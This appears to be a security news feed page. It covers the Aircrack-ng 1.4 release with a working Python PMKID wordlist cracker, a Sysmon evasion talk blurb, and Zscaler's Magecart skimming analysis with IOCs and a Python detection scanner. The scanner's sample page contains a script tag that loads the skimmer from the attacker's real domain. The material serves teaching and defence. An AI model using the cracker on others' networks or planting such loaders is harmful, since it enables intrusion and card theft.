Aircrack-ng 1.4 – Complete Suite Of Tools To Assess WiFi Network Security

Aircrack-ng is a complete suite of tools to assess WiFi network security. It focuses on different areas of WiFi security:

- Monitoring: packet capture and export of data to text files for further processing by third-party tools.
- Attacking: replay attacks, deauthentication, fake access points and others via packet injection.
- Testing: checking WiFi cards and driver capabilities (capture and injection).
- Cracking: WEP and WPA PSK (WPA 1 and 2).

All tools are command line, which allows for heavy scripting. A lot of GUIs have taken advantage of this feature. It works primarily on Linux but also on Windows, OS X, FreeBSD, OpenBSD, NetBSD, as well as Solaris and even eComStation 2.

Aircrack-ng 1.4

This release focuses a lot on code quality and adds a few visible features:

- PMKID cracking
- Cracking 802.11w capture files
- Speed and memory usage improvements when loading (large) files with Aircrack-ng and Airdecap-ng
- Packages for Linux distributions and Windows
- Fixed building on various platforms
- Improved and tweaked CI/CD processes
- New CI/CD tooling for the buildbots and packaging (PyDeployer)
- Almost doubled the number of tests

PMKID

On APs that support PMK caching and fast roaming (802.11i/802.11r), the AP can cache an "ID" for the connection so roaming clients don't have to waste frames reauthenticating and can just present the PMKID, which decreases latency a bit (from 6 frames to only 2).

The PMKID is calculated this way:

PMKID = HMAC-SHA1-128(PMK, "PMK Name" | BSSID | STA MAC)

For WPA/WPA2-PSK the PMK is derived from the passphrase and SSID with PBKDF2-HMAC-SHA1 (4096 iterations), which is why a captured PMKID can be attacked offline with a wordlist. A big advantage here is that this PMKID is present in the first EAPOL frame of the 4-way handshake, which the AP sends, so no client needs to complete a full handshake for the capture to be usable. A few caveats about this attack:

- Sometimes APs send an empty PMKID.
- It doesn't work on WPA/WPA2 Enterprise networks, where the PMK comes from the EAP exchange rather than from a passphrase.

When loading a PCAP, Aircrack-ng will detect if it contains a PMKID. In the following screenshot, it is present for the network ogogo; notice the "with PMKID" on the same line. When selecting the network, it will use it as if it were a regular PCAP with a handshake (and thus the wordlist requirement applies).

If you'd like to test, two capture files with PMKID are available among the test files: test-pmkid.pcap and test1.pcap. More details about the attack itself can be found in this post.

More info: https://aircrack-ng.blogspot.com/2018/09/aircrack-ng-14.html

Install

    git clone https://github.com/aircrack-ng/aircrack-ng
    cd aircrack-ng
    ./autogen.sh
    make
    make install
    cd src/aircrack-ng

Download Aircrack-ng
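The PMKID derivation above, carried through to the offline wordlist check it enables, as an added example written for this page (it is not Aircrack-ng code and does not read PCAPs). The four values are exchanged as a single text line in hashcat's 16800 layout (PMKID*AP MAC*STA MAC*ESSID, all hex) purely because it is a convenient textual form; the BSSID, client MAC, passphrase and wordlist are constructed for the demo, and "ogogo" is just the network name from the screenshot. It covers WPA/WPA2-PSK with the SHA-1 AKM, which is the formula quoted above; other AKMs derive the PMKID differently. An all-zero PMKID, the "empty PMKID" caveat, is rejected up front rather than hashed against.

```python
"""PMKID derivation and offline wordlist check for WPA/WPA2-PSK (SHA-1 AKM).

Added example for this page, not Aircrack-ng code. Standard library only.
"""
import hashlib
import hmac


def derive_pmk(passphrase: str, essid: bytes) -> bytes:
    """WPA/WPA2-Personal: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"), essid, 4096, 32)


def compute_pmkid(pmk: bytes, bssid: bytes, sta_mac: bytes) -> bytes:
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" | BSSID | STA MAC): first 16 bytes of the HMAC."""
    return hmac.new(pmk, b"PMK Name" + bssid + sta_mac, hashlib.sha1).digest()[:16]


def parse_pmkid_line(line: str):
    """Parse hashcat's 16800 layout: PMKID*AP_MAC*STA_MAC*ESSID, every field hex-encoded."""
    fields = line.strip().split("*")
    if len(fields) != 4:
        raise ValueError("expected PMKID*AP_MAC*STA_MAC*ESSID")
    pmkid, bssid, sta, essid = (bytes.fromhex(f) for f in fields)
    if len(pmkid) != 16 or len(bssid) != 6 or len(sta) != 6:
        raise ValueError("bad field length")
    if pmkid == bytes(16):
        # Some APs send an empty (all-zero) PMKID; there is nothing to crack against.
        raise ValueError("empty PMKID; capture a full handshake instead")
    return pmkid, bssid, sta, essid


def crack_pmkid(line: str, wordlist):
    """Return the first wordlist entry whose PMKID matches, or None."""
    pmkid, bssid, sta, essid = parse_pmkid_line(line)
    for candidate in wordlist:
        candidate = candidate.rstrip("\r\n")
        if not 8 <= len(candidate) <= 63:
            continue  # WPA passphrases are 8..63 characters; skip impossible entries
        if hmac.compare_digest(compute_pmkid(derive_pmk(candidate, essid), bssid, sta), pmkid):
            return candidate
    return None


def make_pmkid_line(passphrase: str, essid: bytes, bssid: bytes, sta: bytes) -> str:
    """Build a 16800-style line from known values (used here only to create demo data)."""
    pmkid = compute_pmkid(derive_pmk(passphrase, essid), bssid, sta)
    return "*".join(x.hex() for x in (pmkid, bssid, sta, essid))


# Constructed sample: "ogogo" is the network name from the screenshot; the MACs and
# the passphrase are made up for this example.
SAMPLE_LINE = make_pmkid_line(
    "correct horse", b"ogogo", bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb")
)
WORDLIST = ["password", "short", "12345678", "correct horse", "letmein1"]

if __name__ == "__main__":
    print(SAMPLE_LINE)
    print("recovered passphrase:", crack_pmkid(SAMPLE_LINE, WORDLIST))
```

PBKDF2 at 4096 iterations is the whole cost of the attack: each candidate costs one PMK derivation and one cheap HMAC, and the PMK depends only on the SSID, so a PMK list precomputed for a common SSID can be reused against every network with that name.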

Link: http://feedproxy.google.com/~r/PentestTools/~3/yuSK_tUptqQ/aircrack-ng-14-complete-suite-of-tools.html

Offensive Operating Against SysMon, Carlos Perez – Paul’s Security Weekly #577

Carlos Perez delivers the Technical Segment on how to operate offensively against Sysmon. He talks about how Sysmon allows him to create rules and track specific types of tradecraft around process creation and process termination. He dives into network connections, driver loading, image loading, creation of remote threads, and more!
The post Offensive Operating Against SysMon, Carlos Perez – Paul’s Security Weekly #577 appeared first on Security Weekly.

Link: http://feedproxy.google.com/~r/securityweekly/Lviv/~3/ZcUh9FtxQUc/

Magecart campaign remains active

The Zscaler ThreatLabZ team has been tracking the Magecart campaign for several months. Magecart is a notorious hacker group that has been responsible for large attacks on the e-commerce sites of well-known brands, and we have continued to see its activity during this past month. In this blog, we will examine this campaign's recent activity and its methods for skimming credit and debit card information for financial gain.

The e-commerce sites targeted by Magecart are being compromised and injected with malicious, obfuscated JavaScript, which, in turn, tries to tap into purchase transactions. The injected script typically adds a form to the payment page at runtime using Document Object Model (DOM) properties. This form captures information such as the site's domain, credit card details, and the user's personal information, and then makes a POST request, sending all stolen information to a remote site.

Magecart compromise sample

As shown in the screenshot below, the attacker compromises the site and injects a script tag in order to dynamically load highly obfuscated JavaScript code hosted remotely.

Figure 1: Magecart compromised site

The obfuscated JavaScript code as well as the deobfuscated version of the same can be seen below. Obfuscation is a common technique leveraged by the attackers to evade detection by security crawlers.

Figure 2: Injected JavaScript code for stealing information

As shown in the image below, this script tries to steal financial and personal information from the form input elements of the target site, and sends the collected information back to the attacker-controlled site.

Figure 3: POST request with stolen information

The domain used by the attacker to host malicious scripts and receive stolen information was registered in early September 2018. This newly registered domain is part of a trend we are seeing that minimizes the attacker's chances of getting blocked by reputation engines, as the site is too new to have a low rating. Fun fact: the attacker also listed this domain for sale.

Figure 4: Attacker's domain registration

Below are hits we have seen from the Magecart campaign in the past month.

Figure 5: Campaign activity in the past month

Although this campaign is not new, we continue to see newer domains being leveraged and additional e-commerce sites being impacted on a regular basis. Scripts used in the new and previous campaigns are similar; both domains are hosted on AS24936 (Moscow), and the campaigns may involve the same actor. Here is a comparison of the deobfuscated JavaScript.

Figure 6: Deobfuscated JavaScript

Sites compromised by Magecart can easily be searched from publicly available data (PublicWWW and Censys.io).

Figure 7: Sites infected with Magecart

Although magentocore[.]net is not responding at the moment, infected domains/URLs can be searched on PublicWWW. Compromised sites seen recently by ThreatLabZ can be found here.

IOCs

83.166.243[.]206
magento[.]name/mage/mage.js
magento[.]name/mage/mail2.php
magentocore[.]net/mage/mage.js
magentocore[.]net/mage/mail2.php

References:

https://gwillem.gitlab.io/2018/08/30/magentocore.net_skimmer_most_aggressive_to_date/
https://www.riskiq.com/blog/labs/magecart-ticketmaster-breach/

Conclusion

Attackers are increasingly creative in their methods for generating income, whether through cryptomining, fake tech support scams, or, as in the case of Magecart campaigns, skimming for credit and debit card information. Magecart has been responsible for large-scale attacks on well-known brands, and the ThreatLabZ team will continue to monitor its activities to ensure coverage for Zscaler customers.
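A check for the injection pattern described above (a script tag added to the checkout page that loads a remotely hosted, obfuscated loader), as an added example written for this page rather than Zscaler's tooling. It walks the script tags of a page with Python's standard HTML parser, compares each external src against a first-party allowlist and against the defanged IOC hosts from the post, and flags inline scripts carrying common obfuscation markers. The sample HTML, the allowlisted CDN host and the obfuscation thresholds are constructed for the demo; only the IOC domains come from the post.

```python
"""Scan checkout-page HTML for Magecart-style injected script loaders.

Added example for this page, not Zscaler's code. Standard library only.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# IOCs as published in the post (defanged). Refanged for matching below.
IOCS_DEFANGED = [
    "magento[.]name/mage/mage.js",
    "magento[.]name/mage/mail2.php",
    "magentocore[.]net/mage/mage.js",
    "magentocore[.]net/mage/mail2.php",
]


def refang(ioc: str) -> str:
    """Turn a defanged indicator ('example[.]com') back into a matchable host/URL."""
    return ioc.replace("[.]", ".")


IOC_HOSTS = {urlparse("//" + refang(ioc)).hostname for ioc in IOCS_DEFANGED}

# Heuristic markers typical of packed skimmer code (threshold values are assumptions).
OBFUSCATION_MARKERS = ("eval(", "unescape(", "fromCharCode", "atob(")
HEX_ESCAPE = re.compile(r"\\x[0-9a-fA-F]{2}")
HEX_ESCAPE_THRESHOLD = 20


class ScriptCollector(HTMLParser):
    """Collect external script URLs and inline script bodies from a page."""

    def __init__(self):
        super().__init__()
        self.external = []   # src attribute of each <script src=...>
        self.inline = []     # body of each <script> without src
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script, self._buf = True, []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self.inline.append("".join(self._buf))
            self._in_script = False


def looks_obfuscated(js: str) -> bool:
    return any(m in js for m in OBFUSCATION_MARKERS) or len(HEX_ESCAPE.findall(js)) > HEX_ESCAPE_THRESHOLD


def scan_page(html: str, first_party_hosts: set) -> list:
    """Return (finding_kind, evidence) tuples for suspicious script tags."""
    parser = ScriptCollector()
    parser.feed(html)
    findings = []
    for src in parser.external:
        host = urlparse(src).hostname  # None for relative URLs, i.e. same-origin scripts
        if host is None or host in first_party_hosts:
            continue
        if host in IOC_HOSTS:
            findings.append(("ioc_match", src))
        else:
            findings.append(("unknown_third_party_script", src))
    for js in parser.inline:
        if looks_obfuscated(js):
            findings.append(("obfuscated_inline_script", js.strip()[:60]))
    return findings


# Constructed sample page: one same-origin script, one allowlisted CDN script,
# one loader pointing at an IOC host, and one packed inline script.
SAMPLE_HTML = """<html><head>
<script src="/js/checkout.js"></script>
<script src="https://cdn.shop.example/lib/jquery.min.js"></script>
<script type="text/javascript" src="https://magentocore.net/mage/mage.js"></script>
<script>var _0x1a2b=["\\x66\\x6f\\x72\\x6d","\\x69\\x6e\\x70\\x75\\x74"];eval(_0x1a2b[0]);</script>
</head><body><form id="checkout"><input name="cc_number"></form></body></html>"""
FIRST_PARTY = {"cdn.shop.example"}

if __name__ == "__main__":
    for kind, evidence in scan_page(SAMPLE_HTML, FIRST_PARTY):
        print(f"{kind}: {evidence}")
```

The host-only match is deliberate: the post notes that new domains keep appearing, so the IOC list is a floor, and the unknown_third_party_script finding is the one worth reviewing on a checkout page, where any script host outside the allowlist is suspect regardless of reputation age.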

Link: https://www.zscaler.com/blogs/research/magecart-campaign-remains-active